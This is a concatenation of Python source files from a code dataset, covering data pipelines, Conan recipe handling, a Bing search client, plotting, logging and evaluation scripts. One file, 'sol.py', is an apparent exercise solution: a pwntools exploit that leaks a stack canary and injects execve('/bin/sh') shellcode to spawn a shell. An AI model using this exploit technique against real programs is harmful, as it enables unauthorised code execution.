input_pipeline(filename=\"preprocessed_TSA_scans-tz17-250-250-b10.npy\", path=PREPROCESSED_DATA_FOLDER)\n#print (' -> features shape {}:{}:{}'.format(len(feature_batch), \n# len(feature_batch[0]), \n# len(feature_batch[0][0])))\n#print (' -> labels shape {}:{}'.format(len(label_batch), len(label_batch[0])))\n#print (' -> labels {}'.format(label_batch))\n#print (' -> labels {}'.format(feature_batch[0]))\n","sub_path":"generate_input_pipeline.py","file_name":"generate_input_pipeline.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"173758727","text":"import xml.etree.ElementTree as et\nimport os.path\n'''\n\tget the \n'''\nclass cataloger():\n\tmusic_file = None\n\tfile = None\n\tdef __init__(self):\n\t\tfile = et.Element('Music Library')\n\t\tmusic_file = et.ElementTree(file)\n\t\tpass\n\tdef start_cataloging(self, entry_point):\n\t\tfor directory in os.listdir(entry_point):\n\t\t\tif os.path.isdir(entry_point+'\\\\'+directory) == True:\n\t\t\t\tself.start_cataloging(entry_point+'\\\\'+directory)\n\t\t\telif os.path.isfile(entry_point+'\\\\'+directory) == True:\n\t\t\t\tself.write_xml_data(entry_point+'\\\\'+directory, directory)\n\t\tself.finish()\n\n\tdef write_xml_data(self, filepath, filename):\n\t\tsong = et.SubElement(file, 'song_name')\n\t\tsong.set('name', filename)\n\t\tet.SubElement(song,'filepath').text = filepath\n\tdef finish(self):\n\t\toutFile = open('homemade.xml', 'w')\n\t\tmusic_file.write(outFile)\nif __name__ == '__main__':\n\tcat = cataloger()\n\tcat.start_cataloging('C:\\\\Users\\\\vivacba\\\\Desktop\\\\Franco Stuff\\\\Time Bitmaps')\n","sub_path":"file_cataloger.py","file_name":"file_cataloger.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521760010","text":"#!/usr/bin/env python2\n\nfrom pwn import *\n\n# fread reads 16 bytes without\n# appending a null terminator\n# send in 16 bytes (15 A's + newline)\n# printf prints string. Will print data\n# until it hits null terminator\n# it will print 15 * \"A\" + \"\\n\" + canary_value\n# returns the 8 bytes of the canary\ndef get_canary(p):\n p.recvline() #\"Enter as: \"\n p.sendline(\"A\"*15) \n p.recvline() #\"This is the 6447 ....\"\n return p.recvline()[:8]\n\n\ndef get_buff_addr(p):\n p.recvuntil(\"[\", drop=True)\n addr = p.recvuntil(\"]\", drop=True)\n return int(addr, 16)\n\n\ndef send_payload(p, payload):\n p.recvline()\n p.sendline(payload)\n\n\np = process('./shellcrack')\ncanary = get_canary(p)\nbuff_addr = get_buff_addr(p)\n\nshellcode = '''\n call drop\n .string \"/bin/sh\"\ndrop:\n pop ebx\n mov eax, 0x0b\n xor ecx, ecx\n xor edx, edx\n int 0x80\n'''\n\npayload = fit({\n 0: asm(shellcode),\n 0x44 - 0x14: canary,\n 0x44 + 4: p32(buff_addr) \n})\n\nsend_payload(p, payload)\n\np.interactive()\n","sub_path":"shellcode/shellcrack/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"201828213","text":"#-*- coding:utf-8; mode:python; indent-tabs-mode: nil; c-basic-offset: 2; tab-width: 2 -*-\n\nimport re\n\nfrom collections import namedtuple\n\nfrom bes.system.check import check\nfrom bes.common.node import node\nfrom bes.common.tuple_util import tuple_util\nfrom bes.compat.StringIO import StringIO\nfrom bes.fs.file_util import file_util\nfrom bes.key_value.key_value_list import key_value_list\n\nfrom .recipe_error import recipe_error\nfrom .recipe_util import recipe_util\nfrom .recipe_data_manager import recipe_data_manager\n\nclass recipe(namedtuple('recipe', 'format_version, filename, enabled, properties, requirements, descriptor, instructions, steps, python_code, variables, data')):\n\n CHECK_UNKNOWN_PROPERTIES = True\n FORMAT_VERSION = 2\n\n MAGIC = '!rebuild.recipe!'\n \n def __new__(clazz, format_version, filename, enabled, properties, requirements,\n descriptor, instructions, steps, python_code, variables, data):\n check.check_int(format_version)\n check.check_recipe_enabled(enabled)\n if format_version != clazz.FORMAT_VERSION:\n raise recipe_error('Invalid recipe format_version %d' % (format_version), filename, 1)\n check.check_string(filename)\n check.check_string(python_code, allow_none = True)\n check.check_masked_value_list(variables, allow_none = True)\n check.check_masked_value_list(data, allow_none = True)\n return clazz.__bases__[0].__new__(clazz, format_version, filename, enabled,\n properties, requirements, descriptor,\n instructions, steps, python_code, variables,\n data)\n\n @property\n def name(self):\n return self.descriptor.name\n\n @property\n def version(self):\n return self.descriptor.version\n \n @property\n def upstream_version(self):\n return self.version.upstream_version\n \n @property\n def revision(self):\n return self.version.revision\n \n def __str__(self):\n return self.to_string()\n\n def to_string(self, depth = 0, indent = 2):\n return recipe_util.root_node_to_string(self._to_node(), depth = depth, indent = indent)\n \n def _to_node(self):\n 'A convenient way to make a recipe string is to build a graph first.'\n root = node('package %s %s %s' % (self.descriptor.name, self.descriptor.version.upstream_version, self.descriptor.version.revision))\n root.add_child('')\n if self.python_code:\n root.children.append(recipe_util.python_code_to_node(self.python_code))\n root.add_child('')\n if self.enabled:\n if self.enabled.expression.lower() not in [ '', 'true' ]:\n root.add_child('enabled=%s' % (self.enabled.expression))\n root.add_child('')\n if self.data:\n x = recipe_data_manager.from_masked_value_list(self.data)\n root.children.append(recipe_util.lines_to_node('data', str(x)))\n root.add_child('')\n if self.variables:\n root.children.append(recipe_util.variables_to_node('variables', self.variables))\n root.add_child('')\n if self.properties:\n root.children.append(self._properties_to_node(self.properties))\n root.add_child('')\n if self.requirements:\n root.children.append(recipe_util.requirements_to_node('requirements', self.requirements))\n root.add_child('')\n root.children.append(self._steps_to_node(self.steps))\n return root\n\n @classmethod\n def _properties_to_node(clazz, properties):\n properties_node = node('properties')\n for key in sorted([ key for key in properties.keys()]):\n clazz._property_to_node(properties_node, key, properties)\n return properties_node\n\n @classmethod\n def _property_to_node(clazz, properties_node, key, properties):\n assert isinstance(properties_node, node)\n assert key in properties\n value = properties[key]\n if key in [ 'export_compilation_flags_requirements', 'extra_cflags' ]:\n properties_node.children.append(clazz._system_specific_property_to_node(key, properties))\n elif key in [ 'download_url', 'pkg_config_name' ]:\n properties_node.children.append(node('%s=%s' % (key, value)))\n else:\n if clazz.CHECK_UNKNOWN_PROPERTIES:\n raise RuntimeError('Unknown property: %s' % (key))\n else:\n properties_node.children.append(node('%s=%s' % (key, value)))\n del properties[key]\n\n @classmethod\n def _system_specific_property_to_node(clazz, key, properties):\n assert key in properties\n value = properties[key]\n check.check_masked_value_list(value)\n child = node(key)\n for i in value:\n child.add_child(i)\n return child\n\n @classmethod\n def _steps_to_node(clazz, steps):\n result = node('steps')\n for step in steps:\n step_node = result.add_child(step.name)\n for value in step.values:\n if len(value.values) == 1 and value.values[0].mask is None:\n step_node.add_child(str(value))\n else:\n value_node = step_node.add_child(value.key)\n for masked_value in value.values:\n masked_value_node = value_node.add_child(masked_value.to_string(quote = False))\n step_node.add_child('')\n result.add_child('')\n return result\n\n @classmethod\n def _masked_value_list_to_node(clazz, key, mvl):\n result = node(key)\n for mv in mvl:\n result.add_child(mv.to_string())\n return result\n\n def resolve_variables(self, system):\n if not self.variables:\n return key_value_list()\n return self.variables.resolve(system, 'key_values')\n \n def resolve_data(self, system):\n if not self.data:\n return []\n result = []\n for value in self.data:\n if value.mask_matches(system):\n result.append(tuple(value.value.value))\n return result\n\n def save_to_file(self, filename):\n buf = StringIO()\n buf.write(self.MAGIC)\n buf.write('\\n')\n buf.write('\\n')\n buf.write(str(self))\n buf.write('\\n')\n file_util.save(filename, buf.getvalue())\n\n def clone(self, mutations = None):\n return tuple_util.clone(self, mutations = mutations)\n\n @classmethod\n def is_recipe(clazz, filename):\n 'Return True if filename is a valid recipe.'\n return recipe_util.file_starts_with_magic(filename, clazz.MAGIC)\n\n def find_step_values(self, step_name, value_name):\n for step in self.steps:\n if step_name in [ step.name, '*' ]:\n for value in step.values:\n if value.key == value_name:\n return value.values\n return None\n \ncheck.register_class(recipe, include_seq = False)\n","sub_path":"lib/rebuild/recipe/recipe.py","file_name":"recipe.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"573262001","text":"import textwrap\nimport unittest\n\nfrom conans.test.utils.tools import TestClient, GenConanfile\n\n\nclass RequireOverrideTest(unittest.TestCase):\n\n def setUp(self):\n self.client = TestClient()\n\n def _save(self, req_method, requires):\n conanfile = GenConanfile()\n for req in requires:\n req2, override = req if isinstance(req, tuple) else (req, False)\n if not req_method:\n conanfile.with_require_plain(req2, override=override)\n else:\n conanfile.with_requirement_plain(req2, override=override)\n self.client.save({\"conanfile.py\": conanfile}, clean_first=True)\n\n def test_override(self):\n self.client.save({\"conanfile.py\": GenConanfile()})\n self.client.run(\"export . libA/1.0@user/channel\")\n # It is necessary to create libA/2.0 to have a conflict, otherwise it is missing\n self.client.run(\"export . libA/2.0@user/channel\")\n\n for req_method in (False, True):\n self._save(req_method, [\"libA/1.0@user/channel\"])\n self.client.run(\"export . libB/1.0@user/channel\")\n self._save(req_method, [\"libA/2.0@user/channel\"])\n self.client.run(\"export . libC/1.0@user/channel\")\n self._save(req_method, [\"libB/1.0@user/channel\", \"libC/1.0@user/channel\"])\n self.client.run(\"info .\", assert_error=True)\n self.assertIn(\"Conflict in libC/1.0@user/channel:\\n\"\n \" 'libC/1.0@user/channel' requires 'libA/2.0@user/channel' while \"\n \"'libB/1.0@user/channel' requires 'libA/1.0@user/channel'.\\n\"\n \" To fix this conflict you need to override the package 'libA' in your root\"\n \" package.\", self.client.out)\n\n self._save(req_method, [\"libB/1.0@user/channel\", \"libC/1.0@user/channel\",\n (\"libA/1.0@user/channel\", \"override\")])\n self.client.run(\"info .\")\n self.assertIn(\"libA/2.0@user/channel overridden\", self.client.out)\n\n def test_public_deps(self):\n client = TestClient()\n pkg2 = textwrap.dedent(\"\"\"\n from conans import ConanFile\n class Pkg(ConanFile):\n requires = (\"pkg/0.1@user/stable\", \"override\"),\n def package_info(self):\n self.output.info(\"PUBLIC PKG2:%s\" % self.cpp_info.public_deps)\n \"\"\")\n client.save({\"conanfile.py\": pkg2})\n client.run(\"create . pkg2/0.1@user/stable\")\n self.assertIn(\"pkg2/0.1@user/stable: PUBLIC PKG2:[]\", client.out)\n pkg3 = textwrap.dedent(\"\"\"\n from conans import ConanFile\n class Pkg(ConanFile):\n requires = \"pkg2/0.1@user/stable\", (\"pkg/0.1@user/stable\", \"override\")\n generators = \"cmake\"\n \"\"\")\n client.save({\"conanfile.py\": pkg3})\n client.run(\"install .\")\n self.assertIn(\"pkg2/0.1@user/stable: PUBLIC PKG2:[]\", client.out)\n conanbuildinfo = client.load(\"conanbuildinfo.cmake\")\n self.assertIn(\"set(CONAN_DEPENDENCIES pkg2)\", conanbuildinfo)\n","sub_path":"conans/test/functional/graph/require_override_test.py","file_name":"require_override_test.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"515947607","text":"import json\nimport urllib\nimport http.client\nimport certifi\n\ndef read_bing_key():\n bing_api_key = None\n\n try:\n with open('bing.key','r') as f:\n bing_api_key = f.readline()\n except:\n raise IOError('bing.key file not found')\n\n return bing_api_key\n\n\ndef run_query(search_terms):\n\n bing_api_key = read_bing_key()\n\n if not bing_api_key:\n raise KeyError(\"Bing Key Not Found\")\n\n host = \"api.cognitive.microsoft.com\"\n path = \"/bing/v7.0/search\"\n\n headers = {'Ocp-Apim-Subscription-Key': bing_api_key}\n\n conn = http.client.HTTPSConnection(host)\n\n query = urllib.parse.quote(search_terms)\n\n conn.request(\"GET\", path + \"?q=\" + query, headers=headers)\n\n response = conn.getresponse()\n\n headers = [k + \": \" + v for (k, v) in response.getheaders()\n if k.startswith(\"BingAPIs-\") or k.startswith(\"X-MSEdge-\")]\n\n result = response.read().decode(\"utf8\")\n\n results = []\n\n json_response = json.loads(result)\n\n for result in json_response['webPages']['value']:\n results.append({'title': result['name'], 'link': result['url'], 'summary': result['snippet']})\n return results\n\ndef main():\n search_item = input(\"Enter your query: \")\n\n r = run_query(search_item)\n print(r)\nif __name__ == '__main__':\n main()","sub_path":"rango/bing_search.py","file_name":"bing_search.py","file_ext":"py","file_size_in_byte":1303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"40810748","text":"\nfrom matplotlib import pyplot as plt\n\nyears = [1950, 1960, 1970, 1980, 1990, 2000, 2010]\ngdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]\nplt.plot(years, gdp, color='green', marker='o', linestyle='solid')\nplt.title(\"Nominal GDP\")\nplt.ylabel(\"billions of $\")\n#plt.show()\n\nmovies = [\n \"Annie Hall\",\n \"Ben-Hur\",\n \"Casablanca\",\n \"Gandhi\",\n \"West Side Story\"\n]\nnum_oscars = [5,11,3,8,10]\n\nxs = [i + 0.1 for i, _ in enumerate(movies)]\n\nprint(xs)\n\nplt.bar(xs, num_oscars)\n\nplt.ylabel(\"# of Academy Award\")\nplt.title(\"My Favorite Movie\")\n\nplt.xticks([i + 0.5 for i, _ in enumerate(movies)], movies)\n\nplt.show()\n","sub_path":"practice_visualize.py","file_name":"practice_visualize.py","file_ext":"py","file_size_in_byte":633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"474442201","text":"from code.engineering import *\n\nEngineering.setupSpark(application = 'prep')\n\nmin = 100\ntop = None\n\nEngineering.numDoMeasurement(subset = 'train', iStep = f'')\n\nEngineering.allDoStandardize(subset = 'train', iStep = f'')\nEngineering.allDoStandardize(subset = 'tests', iStep = f'')\nEngineering.allDoStandardize(subset = 'valid', iStep = f'')\n\nEngineering.catDoMeasurement(subset = 'train', iStep = f'normed')\n\nEngineering.catMaskUncommons(subset = 'train', iStep = f'normed', min = min)\nEngineering.catMaskUncommons(subset = 'tests', iStep = f'normed', min = min)\nEngineering.catMaskUncommons(subset = 'valid', iStep = f'normed', min = min)\n\nEngineering.catDoCodeFeature(subset = 'train', iStep = f'normed.masked-{min:06d}', min = min, fit = True)\nEngineering.catDoCodeFeature(subset = 'tests', iStep = f'normed.masked-{min:06d}', min = min)\nEngineering.catDoCodeFeature(subset = 'valid', iStep = f'normed.masked-{min:06d}', min = min)\n\nEngineering.allDoPackFeature(subset = 'train', iStep = f'normed.masked-{min:06d}.encode', fit = True)\nEngineering.allDoPackFeature(subset = 'tests', iStep = f'normed.masked-{min:06d}.encode')\nEngineering.allDoPackFeature(subset = 'valid', iStep = f'normed.masked-{min:06d}.encode')\n","sub_path":"scripts/prep-000100.py","file_name":"prep-000100.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"605812347","text":"#-*- coding:utf8 -*-\nimport logging\nimport time\n\nclass Log(object):\n\n file_name='log/'+time.strftime('%Y%m%d')+'.log'\n create_time=time.strftime('%Y-%m-%d %H:%M:%S')\n\n def __init__(self,db):\n # 创建一个logger\n self.logger = logging.getLogger('me')\n self.logger.setLevel(logging.DEBUG)\n # 创建一个handler,用于写入日志文件\n fh = logging.FileHandler(self.file_name)\n fh.setLevel(logging.DEBUG)\n # 再创建一个handler,用于输出到控制台\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n # 定义handler的输出格式\n # formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n formatter = logging.Formatter('%(asctime)s - %(levelname)s - %(message)s')\n fh.setFormatter(formatter)\n ch.setFormatter(formatter)\n # 给logger添加handler\n self.logger.addHandler(fh)\n self.logger.addHandler(ch)\n self.db=db\n\n def debug(self,msg):\n self.logger.debug(msg)\n\n def info(self,program_name,platform_name,field,name,value,url):\n self.db.add(\"crawler_log_info\",{\"program_name\":program_name,\"platform_name\":platform_name,\"field\":field,\"name\":name,\"value\":value,\"url\":url,\"create_time\":self.create_time})\n self.logger.info('<%s>(%s) %s :%s[%s]=%s'%(program_name,platform_name,url,field,name,value))\n\n def error(self,program_name,platform_name,content,url):\n self.db.add(\"crawler_log_error\",{\"program_name\":program_name,\"platform_name\":platform_name,\"content\":content,\"url\":url,\"create_time\":self.create_time})\n self.logger.error('<%s>(%s) %s :%s'%(program_name,platform_name,url,content))\n\n def warn(self,msg):\n self.logger.warn(msg)\n\n def critical(self,msg):\n self.logger.critical(msg)","sub_path":"include/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":1835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"401379594","text":"from db import db\nimport users_dao\n\ndef get_user_armies():\n user_id = users_dao.user_id()\n sql = \"SELECT * FROM Army WHERE Users.UserId = :userid AND Users.UserId = Match.User_id AND Match.MatchId = MatchArmy.Match_id AND MatchArmy.Army_id = Army.ArmyId\"\n result = db.session.execute(sql, {\"userid\":user_id})\n return result\n\ndef find_army(id):\n sql = \"SELECT * FROM Army WHERE Army.ArmyId=:army_id\"\n result = db.session.execute(sql, {\"army_id\":id})\n found_match = result.fetchone()\n return found_match\n\ndef create_new(armyname, armysize):\n try:\n sql = \"INSERT INTO Army (armyname, armysize) VALUES (:armyname,:armysize) RETURNING ArmyId\"\n result = db.session.execute(sql, {\"armyname\":armyname, \"armysize\":armysize})\n new_id = result.fetchone()[0]\n db.session.commit()\n except:\n return False\n return new_id\n\ndef delete(ArmyId):\n try:\n sql = \"UPDATE Units SET visible=0 WHERE ArmyId=:armyid\"\n db.session.execute(sql, {\"armyid\":ArmyId})\n db.session.commit()\n except:\n return False\n return True\n\ndef add_unit_to_army(ArmyId, UnitId):\n try:\n sql = \"INSERT INTO ArmyUnit (army_id, unit_id) VALUES (:armyid, unitid)\"\n db.session.execute()\n db.session.commit()\n except:\n return False\n return True\n\ndef remove_unit_from_army(ArmyId, UnitId):\n try:\n sql = \"DELETE * FROM ArmyUnit\" \\\n \"WHERE ArmyUnit.Army_id = :armyid\" \\\n \"AND ArmyUnit.Unit_id = :unitid\"\n db.session.execute(sql, {\"armyid\":ArmyId, \"unitid\":UnitId})\n db.session.commit()\n except:\n return False\n return True\n\n# Known issues\n# 1. If army has multiple entries of a particular unit, remove_unit will remove all of them","sub_path":"armies_dao.py","file_name":"armies_dao.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"521528824","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Date : 2020/12/31 4:01 下午\n# @File : compare_eval_result.py\n# @Author: johnson\n# @Contact : github: johnson7788\n# @Desc :\nimport json\nimport pandas as pd\nimport requests\n\ndef collect_data(devfile=\"../data_root_dir/newcos/dev.json\", eval_results=\"../output_root_dir/newcos/eval_results-newcos.json\"):\n \"\"\"\n 生成excel, 对比main.trainer.py生成的结果和devfile\n :param devfile: 训练文件,格式是 [(text, keyword, labels),..]\n :param eval_results: main.trainer.py生成的文件output文件中的json文件 [(predid, probality)]\n :return:\n \"\"\"\n labels = [\"是\",\"否\"]\n with open(devfile) as f:\n dev_data = json.load(f)\n with open(eval_results) as f:\n eval_data = json.load(f)\n assert len(dev_data) == len(eval_data)\n data = []\n for d, res in zip(dev_data, eval_data):\n one_data = {\"text\": d[0], \"keyword\":d[1], \"label\": d[2], \"predict\":labels[res[0]], \"probability\": format(res[1], \"0.3f\")}\n data.append(one_data)\n df = pd.DataFrame(data)\n excel_file = \"result2.xlsx\"\n writer = pd.ExcelWriter(excel_file, engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到excel成功{excel_file}\")\n return data\n\ndef compare_model(hostname='http://127.0.0.1:3314'):\n \"\"\"\n 把收集到的数据,放到线上,对比一下准确率,不是和咱们自己的模型对比\n :param hostname:\n :return:\n \"\"\"\n url = hostname + '/lavector/rest/aspect-sentiment-batch'\n headers = {'Content-Type': 'application/json'}\n mydata = collect_data()\n post_data = []\n for d in mydata:\n one = (d[\"text\"], [d[\"keyword\"]])\n post_data.append(one)\n data = {'channel': 'jd', 'data': post_data}\n print(f\"发送请求到{url}, 数据量{len(post_data)}\")\n res = requests.post(url, data=json.dumps(data), headers=headers)\n result = res.json()\n myresults = []\n for r in result['result']:\n keyword_list = list(r.keys())\n pres_list = list(r.values())\n assert len(keyword_list) == 1\n assert len(pres_list) == 1\n keyword = keyword_list[0]\n pres = pres_list[0]\n for k,v in pres.items():\n if v == 1:\n if k == \"负向\":\n predict = \"消极\"\n elif k ==\"正向\":\n predict = \"积极\"\n else:\n predict = \"中性\"\n myresults.append([keyword,predict])\n assert len(post_data) == len(myresults)\n\n #保存到文件\n newdata = []\n for d, res in zip(mydata, myresults):\n if res[0] != d[\"keyword\"]:\n print(f\"这条数据预测回来的关键字不一致{res[0]}\")\n continue\n d[\"online_predict\"] = res[1]\n newdata.append(d)\n df = pd.DataFrame(newdata)\n excel_file = \"result_online.xlsx\"\n writer = pd.ExcelWriter(excel_file, engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到excel成功{excel_file}\")\n return newdata\n\ndef read_result_online():\n \"\"\"\n 读取result_online.xlsx,比较\n 上文,关键字,下午的字数比\n pretext + keyword + posttest\n predict 表示的结果是75个字的,25+25+25的结果\n online_predict 表示的结果是 15+30+20\n :return:\n \"\"\"\n df = pd.read_excel(\"result_online.xlsx\")\n total = 0\n\n predict_yes = 0\n online_yes = 0\n for index, row in df.iterrows():\n label = row['label']\n predict = row['predict']\n online_predict = row['online_predict']\n if predict != online_predict:\n total += 1\n if predict == label:\n predict_yes +=1\n elif online_predict == label:\n online_yes +=1\n else:\n print(\"都没预测正确\")\n print(row)\n print()\n print(f\"共有{total}个不一样, 75个字预测的结果是{predict_yes}, 线上65个字的预测结果是{online_yes}\")\n\ndef dopredict(test_data, url=\"http://127.0.0.1:5000/api/predict_macbert\", type=None):\n \"\"\"\n 预测结果\n :param test_data:\n :return:\n \"\"\"\n if type:\n data = {'data': test_data, 'type':type}\n else:\n data = {'data': test_data}\n headers = {'content-type': 'application/json'}\n r = requests.post(url, headers=headers, data=json.dumps(data), timeout=360)\n result = r.json()\n return result\n\ndef download_data_and_compare(hostname=[\"http://192.168.50.139:8081/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile=[\"192.168.50.139_500_8081_0129.json\"], isabsa=True, result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", type=None):\n \"\"\"\n 从label_studio的某个hostname下载数据,然后预测,最后给出结果\n :return:\n \"\"\"\n from absa_api import export_data\n #从label-studio下载文\n original_data = []\n for hname, jfile in zip(hostname,jsonfile):\n json_file = export_data(hostname=hname, dirpath=dirpath, jsonfile=jfile, proxy=False)\n #加载从label-studio获取的到json文件\n with open(json_file, 'r') as f:\n data = json.load(f)\n print(f\"共收集主机{hname}的数据{len(data)} 条\")\n original_data.extend(data)\n data = predict_comare_excel(original_data, result_excel=result_excel, export_wrong_examples_excel=export_wrong_examples_excel,correct_examples_excel= correct_examples_excel, isabsa=isabsa, type=type)\n return data\n\ndef download_data_and_compare_same(hostname=[\"http://192.168.50.139:8081/api/\",\"http://192.168.50.139:8080/api/\"], dirpath=\"/opt/lavector/absa/\", jsonfile=[\"192.168.50.139_500_8081_0129.json\",\"192.168.50.139_500_8080_0129.json\"], isabsa=True):\n \"\"\"\n 对比相同的hostname的数据\n 从label_studio的某个hostname下载数据,然后预测,最后给出结果\n :return:\n \"\"\"\n from absa_api import export_data\n #从label-studio下载文\n if len(hostname) != 2:\n raise Exception(\"必须准2个hostname,里面包含相同的评估数据\")\n result = []\n for hname, jfile in zip(hostname,jsonfile):\n original_data = []\n json_file = export_data(hostname=hname, dirpath=dirpath, jsonfile=jfile, proxy=False)\n #加载从label-studio获取的到json文件\n with open(json_file, 'r') as f:\n data = json.load(f)\n print(f\"共收集主机{hname}的数据{len(data)} 条\")\n original_data.extend(data)\n predict_data, excel_data = predict_comare_excel(original_data, isabsa=isabsa)\n result.append([hname, predict_data, excel_data])\n #对比2个人标注的数据\n diffrent_data = []\n print(f\"对比host为 {result[0][0], result[1][0]}\")\n hname1, data1, pre1 = result[0]\n hname2, data2, pre2 = result[1]\n if len(data1) != len(data2):\n raise Exception(\"两个人标注的数据总数不一致\")\n for d1, d2 in zip(data1,data2):\n if d1[0] != d2[0]:\n print(\"这条数据不一致\")\n else:\n if d1[4] != d2[4]:\n print(f\"2个人标注的标签不一致\")\n print(d1[0])\n print(d1[1])\n print(d1[4])\n print(d2[4])\n one_data = {\"text\": d1[0], \"keyword\": d1[1], \"P1_label\": d1[4], \"P2_label\": d2[4], \"location\": d1[2:4]}\n diffrent_data.append(one_data)\n print(f\"不一致的数据总量是{len(diffrent_data)}\")\n df = pd.DataFrame(diffrent_data)\n writer = pd.ExcelWriter(\"diffrent.xlsx\", engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到diffrent.xlsx excel成功\")\n return data\n\ndef predict_comare_excel(original_data,result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", isabsa=True, type=None):\n \"\"\"\n :param original_data:\n :param result_excel:\n :param export_wrong_examples_excel:\n :param correct_examples_excel:\n :param isabsa:\n :return: data是预处理后的,excel_data是模型预测的结果\n \"\"\"\n from convert_label_studio_data import format_data, do_truncate_data\n # [(text, keyword, start_idx, end_idx, label)]\n data = format_data(original_data)\n # original_data,truncate_data, locations = do_truncate_data(data)\n if isabsa:\n predict_result = dopredict(test_data=data, url=\"http://192.168.50.189:5000/api/predict_macbert\")\n else:\n assert type is not None, \"类型必须给定,确定是成分,还是功效,香味等等\"\n predict_result = dopredict(test_data=data, url=\"http://192.168.50.189:5015/api/predict_truncate\",type=type)\n # print(predict_result)\n excel_data = []\n for d, pred in zip(data, predict_result):\n one_data = {\"text\": d[0], \"keyword\": d[1], \"label\": d[4], \"predict\": pred[0], \"start\": d[2], \"end\":d[3],\n \"probability\": format(pred[1], \"0.3f\"), \"channel\":d[-2], \"wordtype\":d[-1]}\n excel_data.append(one_data)\n df = pd.DataFrame(excel_data)\n writer = pd.ExcelWriter(result_excel, engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到excel成功{result_excel}\")\n\n #预测错误的样本\n predict_wrong_examples = []\n # 保存预测错误的样本到excel中\n correct_examples = []\n for d, pred in zip(data, predict_result):\n one_data = {\"text\": d[0], \"keyword\": d[1], \"label\": d[4], \"predict\": pred[0], \"start\": d[2], \"end\": d[3],\n \"probability\": format(pred[1], \"0.3f\"), \"channel\": d[-2], \"wordtype\": d[-1]}\n if one_data[\"label\"] != one_data[\"predict\"]:\n print(f\"{one_data['text']}: 模型预测的结果与ground truth不一致\")\n predict_wrong_examples.append(one_data)\n else:\n correct_examples.append(one_data)\n print(f\"总样本数是{len(data)},预测错误的样本总数是{len(predict_wrong_examples)}\")\n print(f\"总样本数是{len(data)},预测正确的样本总数是{len(correct_examples)}\")\n\n df = pd.DataFrame(predict_wrong_examples)\n writer = pd.ExcelWriter(export_wrong_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n df = pd.DataFrame(correct_examples)\n writer = pd.ExcelWriter(correct_examples_excel, engine='xlsxwriter')\n df.to_excel(writer, sheet_name='table1')\n writer.save()\n print(f\"保存全部为错误的样本到excel: {export_wrong_examples_excel}完成\")\n print(f\"保存全部为正确的样本到excel: {correct_examples_excel}完成\")\n print(f\"准确率为{(len(correct_examples))/len(data)}\")\n return data, excel_data\n\ndef get_json_data_compare(jsonfile=\"/opt/lavector/192.168.50.119_8086.json\"):\n \"\"\"\n 获取jsonfile,然后预测\n :return:\n \"\"\"\n #加载从label-studio获取的到json文件\n data = predict_comare_excel(jsonfile, result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\")\n return data\n\ndef check_train_data(result_excel=\"result.xlsx\", export_wrong_examples_excel=\"wrong.xlsx\",correct_examples_excel= \"correct.xlsx\", dev=True):\n \"\"\"\n 检查训练和评估模型时,哪些数据被预测错误了, 默认是dev_data\n :return:\n \"\"\"\n train_data = \"data_root_dir/components\"\n from convert_label_studio_data import get_all\n # [(text, keyword, start_idx, end_idx, label)]\n original_data, train_data, dev_data = get_all(absa=False, keep_cancel=False, split=True)\n if dev:\n #评估dev的数据\n eval_data = dev_data\n else:\n eval_data = original_data\n # predict_result = dopredict(test_data=original_data, url=\"http://127.0.0.1:5010/api/predict_truncate\")\n predict_result = dopredict(test_data=eval_data, url=\"http://192.168.50.139:5010/api/predict_truncate\")\n excel_data = []\n for ori, d in zip(eval_data, predict_result):\n one_data = {\"text\": ori[0], \"keyword\": ori[1], \"label\": ori[4], \"predict\": d[0], \"location\": d[3],\n \"probability\": format(d[1], \"0.3f\"), \"channel\": ori[-2], \"wordtype\": ori[-1]}\n excel_data.append(one_data)\n df = pd.DataFrame(excel_data)\n writer = pd.ExcelWriter(result_excel, engine='xlsxwriter')\n df.to_excel(writer)\n writer.save()\n print(f\"保存到excel成功{result_excel}\")\n\n # 预测错误的样本\n predict_wrong_examples = []\n # 保存预测错误的样本到excel中\n correct_examples = []\n for ori, d in zip(eval_data, predict_result):\n one_data = {\"text\": ori[0], \"keyword\": ori[1], \"label\": ori[4], \"predict\": d[0], \"location\": d[3],\n \"probability\": format(d[1], \"0.3f\"), \"channel\": ori[-2], 